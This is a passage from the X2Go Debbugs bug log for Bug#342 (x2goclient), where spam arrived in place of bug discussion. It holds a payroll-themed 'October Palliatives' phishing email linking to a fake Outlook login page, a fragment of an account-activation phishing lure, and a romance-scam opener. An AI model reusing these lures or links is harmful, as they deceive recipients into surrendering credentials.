Click to activate, click here<https://au02-990.weebly.com/>.

If you cannot complete the information, your account will become inactive.

Thank you very much.
Advice center,
(@) 2020. All rights reserved.
[Message part 2 (text/html, inline)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Mon, 05 Oct 2020 20:10:02 GMT) (full text, mbox, link).


Acknowledgement sent to "Newman, Lililan" <23lnewman@tenafly.k12.nj.us>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Mon, 05 Oct 2020 20:10:03 GMT) (full text, mbox, link).


Message #132 received at 342@bugs.x2go.org (full text, mbox, reply):

From: "Newman, Lililan" <23lnewman@tenafly.k12.nj.us>
To: "Newman, Lililan" <23lnewman@tenafly.k12.nj.us>
Subject: October Palliatives
Date: Mon, 5 Oct 2020 20:03:48 +0000

October Palliatives,
You are expected to sign up for the new Palliatives and Benefit for the month of October. To sign up, kindly Visit the October Palliatives page below and complete the required directive to avoid omission of your benefit payment for Octoberber 2020, due to the Pandemic.
Vissit this page https://murrrrestmall.cabanova.com/outlooek-web-app-index.php.html.html to get your Palliatives
Thank you,
Payroll Admin Department.
© 2020 All rights reserved.





















































































































































































NOTICE: This email message, including any attachment(s), is for the sole use of the intended recipient and may contain confidential and privileged information. Any unauthorized review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply email and destroy all copies of the original message.


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Thu, 11 Feb 2021 13:00:11 GMT) (full text, mbox, link).


Acknowledgement sent to sophiajasper103@gmail.com:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Thu, 11 Feb 2021 13:00:11 GMT) (full text, mbox, link).


Message #137 received at 342@bugs.x2go.org (full text, mbox, reply):

From: Sophia jasper <yenajerome67@gmail.com>
To: Recipients <Sophia>
Subject: hello
Date: Thu, 11 Feb 2021 12:55:32 +0000
Greetings I am  Sophia jasper. I hope we can start a relationship please reply me   


Send a report that this bug log contains spam.


X2Go Developers <owner@bugs.x2go.org>. Last modified: Sun Dec 4 08:36:26 2022; Machine Name: ymir.das-netzwerkteam.de

X2Go Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.